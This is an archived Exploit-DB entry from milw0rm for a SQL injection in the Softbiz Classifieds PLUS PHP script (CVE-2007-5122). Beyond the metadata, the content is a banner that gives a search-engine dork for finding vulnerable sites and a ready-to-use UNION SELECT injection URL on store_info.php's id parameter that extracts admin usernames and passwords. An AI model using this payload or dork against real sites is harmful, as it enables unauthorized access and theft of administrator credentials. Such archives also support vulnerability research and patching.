Softbiz Classifieds PLUS id Remote SQL Injection Vulnerability

2007-09-26T00:00:00
ID EDB-ID:4457
Type exploitdb
Reporter Khashayar Fereidani
Modified 2007-09-26T00:00:00

Description

Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability. CVE-2007-5122. Webapps exploit for php platform

                                        
                                            ##################################################$##################################
####                        Classifieds SQL INJECTION                            ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.w0rm & Dr.Crash)                                             #
#Script Download : http://www.softbizscripts.com/                                   #
#DORK: "Powered by SoftbizScripts" inurl:store_info.php                             #
#                                                                                   #
#                                                                                   #
#                                                                                   #
#Injection Adress : http://server.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*
#                                                                                   #
#                                                                                   #
#Our site : Ircrash.com                                                             #
#                                                                                   #
#                                                                                   #
#                                 TNX : GOD                                         #
#####################################################################################

# milw0rm.com [2007-09-26]